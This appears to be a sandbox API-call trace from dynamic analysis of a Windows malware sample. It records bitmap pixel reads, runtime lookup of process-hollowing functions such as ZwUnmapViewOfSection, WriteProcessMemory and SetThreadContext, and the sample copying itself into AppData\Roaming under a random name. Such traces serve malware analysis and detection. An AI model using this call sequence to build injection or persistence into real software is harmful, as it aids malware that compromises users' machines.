[0152.875] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=223, color=0x19eed4) returned 0x0
[0152.875] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.875] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.875] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=224, color=0x19eed4) returned 0x0
[0152.875] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.875] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.875] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=225, color=0x19eed4) returned 0x0
[0152.875] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.875] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.875] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=226, color=0x19eed4) returned 0x0
[0152.875] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.875] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.875] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=227, color=0x19eed4) returned 0x0
[0152.875] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.875] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.875] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=228, color=0x19eed4) returned 0x0
[0152.875] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.875] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.875] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=229, color=0x19eed4) returned 0x0
[0152.875] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.875] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.875] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=230, color=0x19eed4) returned 0x0
[0152.875] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.875] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.876] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=231, color=0x19eed4) returned 0x0
[0152.876] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.876] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.876] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=232, color=0x19eed4) returned 0x0
[0152.876] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.876] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.876] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=233, color=0x19eed4) returned 0x0
[0152.876] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.876] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.876] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=234, color=0x19eed4) returned 0x0
[0152.876] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.876] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.876] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=235, color=0x19eed4) returned 0x0
[0152.876] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.876] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.876] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=236, color=0x19eed4) returned 0x0
[0152.876] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.876] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.876] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=237, color=0x19eed4) returned 0x0
[0152.877] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.877] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.877] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=238, color=0x19eed4) returned 0x0
[0152.877] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.877] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.877] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=239, color=0x19eed4) returned 0x0
[0152.877] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.877] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.877] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=240, color=0x19eed4) returned 0x0
[0152.877] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.877] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.877] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=241, color=0x19eed4) returned 0x0
[0152.877] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.877] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.877] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=242, color=0x19eed4) returned 0x0
[0152.877] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.877] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.877] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=243, color=0x19eed4) returned 0x0
[0152.877] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.877] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.877] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=244, color=0x19eed4) returned 0x0
[0152.877] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.878] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.878] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=245, color=0x19eed4) returned 0x0
[0152.878] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.878] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.878] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=246, color=0x19eed4) returned 0x0
[0152.878] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.878] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.878] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=247, color=0x19eed4) returned 0x0
[0152.878] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=248, color=0x19eed4) returned 0x0
[0152.953] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.954] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.955] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.955] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.955] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.955] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.955] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.955] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.955] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.955] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.955] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.956] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.957] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.958] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.959] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.960] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.961] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.962] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.989] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6ae00, lpName=0x0) returned 0x2fc
[0152.989] memcpy (in: _Dst=0x2090000, _Src=0x3d39670, _Size=0x6ae00 | out: _Dst=0x2090000) returned 0x2090000
[0152.992] CloseHandle (hObject=0x2fc) returned 1
[0156.759] CoTaskMemAlloc (cb=0xd) returned 0x709e38
[0156.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23b5dac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0156.760] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000
[0156.761] CoTaskMemFree (pv=0x709e38)
[0156.774] CoTaskMemAlloc (cb=0x11) returned 0x6ff180
[0156.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResumeThread", cchWideChar=12, lpMultiByteStr=0x23b60e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResumeThread", lpUsedDefaultChar=0x0) returned 12
[0156.774] GetProcAddress (hModule=0x76720000, lpProcName="ResumeThread") returned 0x7673a800
[0156.774] CoTaskMemFree (pv=0x6ff180)
[0156.796] CoTaskMemAlloc (cb=0xd) returned 0x709e38
[0156.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23b68c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0156.797] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000
[0156.797] CoTaskMemFree (pv=0x709e38)
[0156.797] CoTaskMemAlloc (cb=0x1a) returned 0x7232a8
[0156.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64SetThreadContext", cchWideChar=21, lpMultiByteStr=0x23b68f8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64SetThreadContext", lpUsedDefaultChar=0x0) returned 21
[0156.797] GetProcAddress (hModule=0x76720000, lpProcName="Wow64SetThreadContext") returned 0x76763e60
[0156.797] CoTaskMemFree (pv=0x7232a8)
[0156.806] CoTaskMemAlloc (cb=0xd) returned 0x709da8
[0156.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23b69c4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0156.806] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000
[0156.807] CoTaskMemFree (pv=0x709da8)
[0156.807] CoTaskMemAlloc (cb=0x15) returned 0x6ff440
[0156.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetThreadContext", cchWideChar=16, lpMultiByteStr=0x23b69fc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetThreadContext", lpUsedDefaultChar=0x0) returned 16
[0156.807] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadContext") returned 0x76762490
[0156.807] CoTaskMemFree (pv=0x6ff440)
[0156.812] CoTaskMemAlloc (cb=0xd) returned 0x709bf8
[0156.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23b6ac4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0156.812] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000
[0156.812] CoTaskMemFree (pv=0x709bf8)
[0156.812] CoTaskMemAlloc (cb=0x1a) returned 0x7234b0
[0156.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64GetThreadContext", cchWideChar=21, lpMultiByteStr=0x23b6afc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64GetThreadContext", lpUsedDefaultChar=0x0) returned 21
[0156.812] GetProcAddress (hModule=0x76720000, lpProcName="Wow64GetThreadContext") returned 0x76763e30
[0156.813] CoTaskMemFree (pv=0x7234b0)
[0156.816] CoTaskMemAlloc (cb=0xd) returned 0x709d00
[0156.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23b6bc8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0156.816] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000
[0156.817] CoTaskMemFree (pv=0x709d00)
[0156.817] CoTaskMemAlloc (cb=0x15) returned 0x6ff0a0
[0156.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetThreadContext", cchWideChar=16, lpMultiByteStr=0x23b6c00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThreadContext", lpUsedDefaultChar=0x0) returned 16
[0156.817] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadContext") returned 0x7673ec60
[0156.817] CoTaskMemFree (pv=0x6ff0a0)
[0156.820] CoTaskMemAlloc (cb=0xd) returned 0x709c40
[0156.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23b6cbc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0156.820] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000
[0156.821] CoTaskMemFree (pv=0x709c40)
[0156.821] CoTaskMemAlloc (cb=0x13) returned 0x6ff260
[0156.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VirtualAllocEx", cchWideChar=14, lpMultiByteStr=0x23b6cf4, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VirtualAllocEx", lpUsedDefaultChar=0x0) returned 14
[0156.821] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocEx") returned 0x76762730
[0156.821] CoTaskMemFree (pv=0x6ff260)
[0156.837] CoTaskMemAlloc (cb=0xd) returned 0x709be0
[0156.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23b6db0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0156.837] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000
[0156.837] CoTaskMemFree (pv=0x709be0)
[0156.837] CoTaskMemAlloc (cb=0x17) returned 0x6ff200
[0156.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteProcessMemory", cchWideChar=18, lpMultiByteStr=0x23b6de8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteProcessMemory", lpUsedDefaultChar=0x0) returned 18
[0156.837] GetProcAddress (hModule=0x76720000, lpProcName="WriteProcessMemory") returned 0x76762850
[0156.838] CoTaskMemFree (pv=0x6ff200)
[0156.847] CoTaskMemAlloc (cb=0xd) returned 0x709df0
[0156.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23b6eac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0156.847] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000
[0156.847] CoTaskMemFree (pv=0x709df0)
[0156.847] CoTaskMemAlloc (cb=0x16) returned 0x6ff300
[0156.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReadProcessMemory", cchWideChar=17, lpMultiByteStr=0x23b6ee4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadProcessMemory", lpUsedDefaultChar=0x0) returned 17
[0156.848] GetProcAddress (hModule=0x76720000, lpProcName="ReadProcessMemory") returned 0x76761c80
[0156.848] CoTaskMemFree (pv=0x6ff300)
[0156.857] CoTaskMemAlloc (cb=0xa) returned 0x709d18
[0156.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ntdll", cchWideChar=5, lpMultiByteStr=0x23b6fa4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll", lpUsedDefaultChar=0x0) returned 5
[0156.857] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000
[0156.858] CoTaskMemFree (pv=0x709d18)
[0156.858] CoTaskMemAlloc (cb=0x19) returned 0x723708
[0156.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZwUnmapViewOfSection", cchWideChar=20, lpMultiByteStr=0x23b6fd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZwUnmapViewOfSection", lpUsedDefaultChar=0x0) returned 20
[0156.858] GetProcAddress (hModule=0x771d0000, lpProcName="ZwUnmapViewOfSection") returned 0x77246f40
[0156.858] CoTaskMemFree (pv=0x723708)
[0156.866] CoTaskMemAlloc (cb=0xd) returned 0x709bf8
[0156.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x23b7098, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8
[0156.866] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000
[0156.867] CoTaskMemFree (pv=0x709bf8)
[0156.867] CoTaskMemAlloc (cb=0x13) returned 0x6ff300
[0156.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateProcessA", cchWideChar=14, lpMultiByteStr=0x23b70d0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateProcessA", lpUsedDefaultChar=0x0) returned 14
[0156.867] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessA") returned 0x76760750
[0156.867] CoTaskMemFree (pv=0x6ff300)
[0157.196] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", nBufferLength=0x105, lpBuffer=0x19e444, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", lpFilePart=0x0) returned 0x62
[0162.834] CoTaskMemAlloc (cb=0x20c) returned 0x72eda8
[0162.834] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x72eda8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0
[0162.844] CoTaskMemFree (pv=0x72eda8)
[0162.844] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19e42c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25
[0162.869] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", nBufferLength=0x105, lpBuffer=0x19e4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", lpFilePart=0x0) returned 0x32
[0162.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e964) returned 1
[0162.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\gatzisok.exe"), fInfoLevelId=0x0, lpFileInformation=0x19e9e0 | out: lpFileInformation=0x19e9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0162.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e960) returned 1
[0162.893] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", nBufferLength=0x105, lpBuffer=0x19e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", lpFilePart=0x0) returned 0x32
[0162.920] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", nBufferLength=0x105, lpBuffer=0x19e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", lpFilePart=0x0) returned 0x32
[0162.928] SetNamedSecurityInfoW () returned 0x2
[0163.309] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", nBufferLength=0x105, lpBuffer=0x19e474, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", lpFilePart=0x0) returned 0x62
[0163.309] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", nBufferLength=0x105, lpBuffer=0x19e474, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", lpFilePart=0x0) returned 0x32
